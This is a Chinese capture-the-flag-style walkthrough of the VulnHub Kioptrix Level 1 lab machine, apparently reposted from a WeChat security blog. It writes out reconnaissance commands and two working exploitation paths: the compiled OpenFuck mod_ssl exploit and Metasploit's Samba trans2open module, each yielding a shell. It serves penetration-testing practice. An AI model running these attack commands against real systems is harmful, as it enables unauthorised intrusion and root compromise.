虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
虚拟机简介:游戏的目的是通过任何可能的方式获取root用户访问权限
目标:1个flag
级别:初级
1、信息收集
1.1通过arp-scan检测主机IP地址
arp-scan 192.168.1.0/24
1.2 通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.1.6
查看开放22、80、111、139、443端口
2、渗透测试
2.1 HTTP渗透测试
1.访问站点
2.查看网页源代码
3.使用nikto测试站点
nikto -host http://192.168.1.6
存在CVE漏洞
2.2 漏洞利用方式1
1.查看存在mod_ssl漏洞
searchsploit mod_ssl
2.利用漏洞脚本
cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
apt install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto
3.查看文件权限并执行
chmod 777 OpenFuck
./OpenFuck
4.基于Apache版本
5.漏洞利用
./OpenFuck 0x6b 192.168.1.6 443 -c 40
获取到shell权限
6.获取到shell权限
由于需要联网下载库文件,网络不通只获取到Apache权限
2.3 漏洞利用方式2
1.查看smb版本
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.1.6
run
2.查找smb漏洞
提示有trans2open漏洞
3.使用msf漏洞利用
use exploit/linux/samba/trans2open
set rhosts 192.168.1.6
set target 0
run
获取到shell会话
4.连接shell会话
已经获取到root权限
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Kioptrix Level 1(#1)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论